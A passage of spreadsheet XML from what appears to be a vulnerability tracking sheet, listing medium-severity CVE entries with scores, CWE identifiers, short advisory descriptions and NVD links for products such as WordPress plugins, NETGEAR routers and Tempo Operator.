      <c r="B5569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81049</t>
        </is>
      </c>
      <c r="C5569" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5569" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5569" s="5" t="inlineStr"/>
      <c r="F5569" s="5" t="inlineStr"/>
      <c r="G5569" s="5" t="inlineStr"/>
      <c r="H5569" s="5" t="inlineStr"/>
      <c r="I5569" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5569" s="5" t="inlineStr"/>
      <c r="K5569" s="5" t="inlineStr">
        <is>
          <t>CWE-353</t>
        </is>
      </c>
      <c r="L5569" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain a Missing Support for Integrity Check vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary code execution.</t>
        </is>
      </c>
      <c r="M5569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81049</t>
        </is>
      </c>
    </row>
    <row r="5570">
      <c r="A5570" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88914</t>
        </is>
      </c>
      <c r="C5570" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5570" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5570" s="5" t="inlineStr"/>
      <c r="F5570" s="5" t="inlineStr"/>
      <c r="G5570" s="5" t="inlineStr"/>
      <c r="H5570" s="5" t="inlineStr"/>
      <c r="I5570" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5570" s="5" t="inlineStr"/>
      <c r="K5570" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L5570" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GStreamer's gst-plugins-good isomp4 plugin. When processing a specially crafted MP4 or MOV file containing CEA-608 closed-caption data, an integer overflow in 32-bit unsigned arithmetic can bypass a bounds check in the caption parser. This leads to an out-of-bounds heap read of up to 244 bytes, which is then included in the downstream caption output. An attacker could exploit this by tricking a user into opening a malicious media file, potentially resulting in disclosure of adjacent heap memory or application crash.</t>
        </is>
      </c>
      <c r="M5570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88914</t>
        </is>
      </c>
    </row>
    <row r="5571">
      <c r="A5571" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5571" s="5" t="inlineStr">
        <is>
          <t>CVE-2018-10624</t>
        </is>
      </c>
      <c r="C5571" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5571" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5571" s="5" t="inlineStr"/>
      <c r="F5571" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G5571" s="5" t="inlineStr"/>
      <c r="H5571" s="5" t="inlineStr">
        <is>
          <t>johnsoncontrols:bcpro, johnsoncontrols:metasys_system</t>
        </is>
      </c>
      <c r="I5571" s="5" t="inlineStr">
        <is>
          <t>2018-08-01</t>
        </is>
      </c>
      <c r="J5571" s="5" t="inlineStr"/>
      <c r="K5571" s="5" t="inlineStr">
        <is>
          <t>CWE-209, CWE-388</t>
        </is>
      </c>
      <c r="L5571" s="5" t="inlineStr">
        <is>
          <t>In Johnson Controls Metasys System Versions 8.0 and prior and BCPro (BCM) all versions prior to 3.0.2, this vulnerability results from improper error handling in HTTP-based communications with the server, which could allow an attacker to obtain technical information.</t>
        </is>
      </c>
      <c r="M5571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2018-10624</t>
        </is>
      </c>
    </row>
    <row r="5572">
      <c r="A5572" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5572" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-12145</t>
        </is>
      </c>
      <c r="C5572" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5572" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5572" s="5" t="inlineStr"/>
      <c r="F5572" s="5" t="inlineStr"/>
      <c r="G5572" s="5" t="inlineStr"/>
      <c r="H5572" s="5" t="inlineStr"/>
      <c r="I5572" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5572" s="5" t="inlineStr"/>
      <c r="K5572" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5572" s="5" t="inlineStr">
        <is>
          <t>The BuddyPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 14.3.3 via the bp_notifications_action_bulk_manage due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete/mark as read/mark as unread notifications of other users.</t>
        </is>
      </c>
      <c r="M5572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-12145</t>
        </is>
      </c>
    </row>
    <row r="5573">
      <c r="A5573" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5573" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-2786</t>
        </is>
      </c>
      <c r="C5573" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5573" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5573" s="5" t="inlineStr"/>
      <c r="F5573" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5573" s="5" t="inlineStr"/>
      <c r="H5573" s="5" t="inlineStr"/>
      <c r="I5573" s="5" t="inlineStr">
        <is>
          <t>2025-04-02</t>
        </is>
      </c>
      <c r="J5573" s="5" t="inlineStr"/>
      <c r="K5573" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5573" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Tempo Operator, where it creates a ServiceAccount, ClusterRole, and ClusterRoleBinding when a user deploys a TempoStack or TempoMonolithic instance. This flaw allows a user with full access to their namespace to extract the ServiceAccount token and use it to submit TokenReview and SubjectAccessReview requests, potentially revealing information about other users' permissions. While this does not allow privilege escalation or impersonation, it exposes information that could aid in gathering information for further attacks.</t>
        </is>
      </c>
      <c r="M5573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-2786</t>
        </is>
      </c>
    </row>
    <row r="5574">
      <c r="A5574" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5574" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-2842</t>
        </is>
      </c>
      <c r="C5574" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5574" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5574" s="5" t="inlineStr"/>
      <c r="F5574" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5574" s="5" t="inlineStr"/>
      <c r="H5574" s="5" t="inlineStr"/>
      <c r="I5574" s="5" t="inlineStr">
        <is>
          <t>2025-04-02</t>
        </is>
      </c>
      <c r="J5574" s="5" t="inlineStr"/>
      <c r="K5574" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5574" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Tempo Operator. When the Jaeger UI Monitor Tab functionality is enabled in a Tempo instance managed by the Tempo Operator, the Operator creates a ClusterRoleBinding for the Service Account of the Tempo instance to grant the cluster-monitoring-view ClusterRole.
This can be exploited if a user has 'create' permissions on TempoStack and 'get' permissions on Secret in a namespace (for example, a user has ClusterAdmin permissions for a specific namespace), as the user can read the token of the Tempo service account and therefore has access to see all cluster metrics.</t>
        </is>
      </c>
      <c r="M5574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-2842</t>
        </is>
      </c>
    </row>
    <row r="5575">
      <c r="A5575" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0305</t>
        </is>
      </c>
      <c r="C5575" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5575" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5575" s="5" t="inlineStr"/>
      <c r="F5575" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5575" s="5" t="inlineStr">
        <is>
          <t>windows, palo alto</t>
        </is>
      </c>
      <c r="H5575" s="5" t="inlineStr"/>
      <c r="I5575" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5575" s="5" t="inlineStr"/>
      <c r="K5575" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5575" s="5" t="inlineStr">
        <is>
          <t>An information disclosure vulnerability in the Palo Alto Networks Prisma® Access Agent on Linux enables a local user to access sensitive configuration data and credentials.
The Prisma Access Agent on macOS, Windows, iOS, Android and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M5575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0305</t>
        </is>
      </c>
    </row>
    <row r="5576">
      <c r="A5576" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11737</t>
        </is>
      </c>
      <c r="C5576" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5576" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5576" s="5" t="inlineStr"/>
      <c r="F5576" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5576" s="5" t="inlineStr"/>
      <c r="H5576" s="5" t="inlineStr">
        <is>
          <t>netgear:rax20, netgear:rax20_firmware, netgear:rax41, netgear:rax41_firmware, netgear:rax41v2, netgear:rax41v2_firmware, netgear:rax42, netgear:rax42_firmware, netgear:rax42v2, netgear:rax42v2_firmware</t>
        </is>
      </c>
      <c r="I5576" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5576" s="5" t="inlineStr"/>
      <c r="K5576" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5576" s="5" t="inlineStr">
        <is>
          <t>Insufficient input validation vulnerability in the listed 
NETGEAR models allows authenticated administrators connected to the 
local network to make unauthorized modification to the device software and 
functionality.</t>
        </is>
      </c>
      <c r="M5576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11737</t>
        </is>
      </c>
    </row>
    <row r="5577">
      <c r="A5577" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11738</t>
        </is>
      </c>
      <c r="C5577" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5577" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5577" s="5" t="inlineStr"/>
      <c r="F5577" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5577" s="5" t="inlineStr"/>
      <c r="H5577" s="5" t="inlineStr">
        <is>
          <t>netgear:be9300, netgear:be9300_firmware, netgear:mr60, netgear:mr60_firmware, netgear:ms60, netgear:ms60_firmware, netgear:r6700ax, netgear:r6700ax_firmware, netgear:rax10, netgear:rax10_firmware</t>
        </is>
      </c>
      <c r="I5577" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5577" s="5" t="inlineStr"/>
      <c r="K5577" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5577" s="5" t="inlineStr">
        <is>
          <t>Insufficient input validation vulnerability in the listed NETGEAR models allows authenticated administrators connected to the local network to make unauthorized modification to router software and functionality.</t>
        </is>
      </c>
      <c r="M5577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11738</t>
        </is>
      </c>
    </row>
    <row r="5578">
      <c r="A5578" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11838</t>
        </is>
      </c>
      <c r="C5578" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5578" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5578" s="5" t="inlineStr"/>
      <c r="F5578" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5578" s="5" t="inlineStr"/>
      <c r="H5578" s="5" t="inlineStr"/>
      <c r="I5578" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5578" s="5" t="inlineStr"/>
      <c r="K5578" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L5578" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function vulnerability in Yordam Informatics Technology Consulting, Training, and Electronic Systems Industry and Trade Inc. Library Reservation System allows Input Data Manipulation.
This issue affects Library Reservation System: before v22.2.</t>
        </is>
      </c>
      <c r="M5578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11838</t>
        </is>
      </c>
    </row>
    <row r="5579">
      <c r="A5579" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13159</t>
        </is>
      </c>
      <c r="C5579" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5579" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5579" s="5" t="inlineStr"/>
      <c r="F5579" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5579" s="5" t="inlineStr"/>
      <c r="H5579" s="5" t="inlineStr"/>
      <c r="I5579" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5579" s="5" t="inlineStr"/>
      <c r="K5579" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5579" s="5" t="inlineStr">
        <is>
          <t>The Real Estate Papi WordPress theme through 1.0.5 does not perform capability or CSRF checks on one of its AJAX actions, allowing any authenticated user, such as a subscriber, to install a fixed set of companion  from the WordPress.org repository. Where the request runs in the session of a user who can activate , those  are activated as well.</t>
        </is>
      </c>
      <c r="M5579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13159</t>
        </is>
      </c>
    </row>
    <row r="5580">
      <c r="A5580" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14466</t>
        </is>
      </c>
      <c r="C5580" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5580" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5580" s="5" t="inlineStr"/>
      <c r="F5580" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5580" s="5" t="inlineStr"/>
      <c r="H5580" s="5" t="inlineStr"/>
      <c r="I5580" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5580" s="5" t="inlineStr"/>
      <c r="K5580" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5580" s="5" t="inlineStr">
        <is>
          <t>It’s possible to run a stored XSS in Stormshield’s web administration panel.
To exploit this vulnerability, a SNS administrator with appropriate permissions must inject  some malicious script in a group’s comments in the webservices administration interface.</t>
        </is>
      </c>
      <c r="M5580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14466</t>
        </is>
      </c>
    </row>
    <row r="5581">
      <c r="A5581" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14566</t>
        </is>
      </c>
      <c r="C5581" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5581" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5581" s="5" t="inlineStr"/>
      <c r="F5581" s="5" t="inlineStr"/>
      <c r="G5581" s="5" t="inlineStr"/>
      <c r="H5581" s="5" t="inlineStr"/>
      <c r="I5581" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5581" s="5" t="inlineStr"/>
      <c r="K5581" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5581" s="5" t="inlineStr">
        <is>
          <t>The advanced-customized-prompts WordPress plugin through 1.0.1 does not perform any capability, ownership, or nonce check before updating WooCommerce order item metadata for a supplied order, allowing any authenticated user such as a subscriber to tamper with the custom metadata of orders belonging to other customers.</t>
        </is>
      </c>
      <c r="M5581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14566</t>
        </is>
      </c>
    </row>
    <row r="5582">
      <c r="A5582" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14892</t>
        </is>
      </c>
      <c r="C5582" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5582" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5582" s="5" t="inlineStr"/>
      <c r="F5582" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5582" s="5" t="inlineStr"/>
      <c r="H5582" s="5" t="inlineStr"/>
      <c r="I5582" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5582" s="5" t="inlineStr"/>
      <c r="K5582" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5582" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Tanium Server.</t>
        </is>
      </c>
      <c r="M5582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14892</t>
        </is>
      </c>
    </row>
    <row r="5583">
      <c r="A5583" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15398</t>
        </is>
      </c>
      <c r="C5583" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5583" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5583" s="5" t="inlineStr"/>
      <c r="F5583" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5583" s="5" t="inlineStr"/>
      <c r="H5583" s="5" t="inlineStr"/>
      <c r="I5583" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5583" s="5" t="inlineStr"/>
      <c r="K5583" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5583" s="5" t="inlineStr">
        <is>
          <t>The Eventin – Event Calendar, Event Registration, Tickets &amp; Booking (AI Powered) plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.1.22. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to bypass payment for paid events, fraudulently mark orders as completed, deplete ticket inventory, and trigger confirmation emails for tickets never purchased. This is exploitable by unauthenticated attackers because the wp_rest nonce is publicly emitted on every frontend page, and the order creation endpoint mints and returns an order_access_token to any caller possessing that nonce — giving unauthenticated users all credentials required to reach the privileged update_booking_status branch.</t>
        </is>
      </c>
      <c r="M5583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15398</t>
        </is>
      </c>
    </row>
    <row r="5584">
      <c r="A5584" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15550</t>
        </is>
      </c>
      <c r="C5584" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5584" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5584" s="5" t="inlineStr"/>
      <c r="F5584" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5584" s="5" t="inlineStr"/>
      <c r="H5584" s="5" t="inlineStr"/>
      <c r="I5584" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5584" s="5" t="inlineStr"/>
      <c r="K5584" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5584" s="5" t="inlineStr">
        <is>
          <t>The Ninja Forms - Save Progress plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 3.0.30. This is due to the lack of capability checks and nonce verification in the 'bulk_actions' function. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary database records from the 'wp_nf3_objects' table, such as saved submissions.</t>
        </is>
      </c>
      <c r="M5584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15550</t>
        </is>
      </c>
    </row>
    <row r="5585">
      <c r="A5585" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15823</t>
        </is>
      </c>
      <c r="C5585" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5585" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5585" s="5" t="inlineStr"/>
      <c r="F5585" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5585" s="5" t="inlineStr"/>
      <c r="H5585" s="5" t="inlineStr"/>
      <c r="I5585" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5585" s="5" t="inlineStr"/>
      <c r="K5585" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5585" s="5" t="inlineStr">
        <is>
          <t>The Builderall Cheetah For Wp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the disable() function in versions up to, and including, 3.0.2. The wp_ajax_ba_cheetah_disable AJAX handler is registered without any capability or nonce verification, and the target post_id is sourced directly from user-controlled $_POST['ba_cheetah_data']['post_id']. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disable the page builder layout on arbitrary posts by setting the _ba_cheetah_enabled post meta to false, including on posts owned by other users.</t>
        </is>
      </c>
      <c r="M5585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15823</t>
        </is>
      </c>
    </row>
    <row r="5586">
      <c r="A5586" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16941</t>
        </is>
      </c>
      <c r="C5586" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5586" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5586" s="5" t="inlineStr"/>
      <c r="F5586" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5586" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H5586" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I5586" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5586" s="5" t="inlineStr"/>
      <c r="K5586" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5586" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, and 7.4 could allow a remote authenticated attacker to modify certain system messages due to improper authorization.</t>
        </is>
      </c>
      <c r="M5586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16941</t>
        </is>
      </c>
    </row>
    <row r="5587">
      <c r="A5587" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18313</t>
        </is>
      </c>
      <c r="C5587" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5587" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5587" s="5" t="inlineStr"/>
      <c r="F5587" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5587" s="5" t="inlineStr"/>
      <c r="H5587" s="5" t="inlineStr"/>
      <c r="I5587" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5587" s="5" t="inlineStr"/>
      <c r="K5587" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L5587" s="5" t="inlineStr">
        <is>
          <t>rpcapd can allocate up to 65536 bytes per each RPCAP_MSG_UPDATEFILTER_REQ or RPCAP_MSG_STARTCAP_REQ message received from the client, but it never frees the memory, so it leaks memory even under normal use.  A malicious client can cause the server to leak memory substantially faster.</t>
        </is>
      </c>
      <c r="M5587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18313</t>
        </is>
      </c>
    </row>
    <row r="5588">
      <c r="A5588" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18594</t>
        </is>
      </c>
      <c r="C5588" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5588" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5588" s="5" t="inlineStr"/>
      <c r="F5588" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5588" s="5" t="inlineStr"/>
      <c r="H5588" s="5" t="inlineStr"/>
      <c r="I5588" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5588" s="5" t="inlineStr"/>
      <c r="K5588" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5588" s="5" t="inlineStr">
        <is>
          <t>The Advanced Contact form 7 DB plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.1.3. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with custom-level access and above, to import forged CSV submission records into any Contact Form 7 form managed by the plugin.</t>
        </is>
      </c>
      <c r="M5588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18594</t>
        </is>
      </c>
    </row>
    <row r="5589">
      <c r="A5589" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19043</t>
        </is>
      </c>
      <c r="C5589" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5589" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5589" s="5" t="inlineStr"/>
      <c r="F5589" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5589" s="5" t="inlineStr"/>
      <c r="H5589" s="5" t="inlineStr"/>
      <c r="I5589" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5589" s="5" t="inlineStr"/>
      <c r="K5589" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5589" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Menulux Software Inc. Menulux Portal allows Accessing Functionality Not Properly Constrained by ACLs.
This issue affects Menulux Portal: before 20260903211448.</t>
        </is>
      </c>
      <c r="M5589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19043</t>
        </is>
      </c>
    </row>
    <row r="5590">
      <c r="A5590" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19081</t>
        </is>
      </c>
      <c r="C5590" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5590" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5590" s="5" t="inlineStr"/>
      <c r="F5590" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5590" s="5" t="inlineStr"/>
      <c r="H5590" s="5" t="inlineStr"/>
      <c r="I5590" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5590" s="5" t="inlineStr"/>
      <c r="K5590" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5590" s="5" t="inlineStr">
        <is>
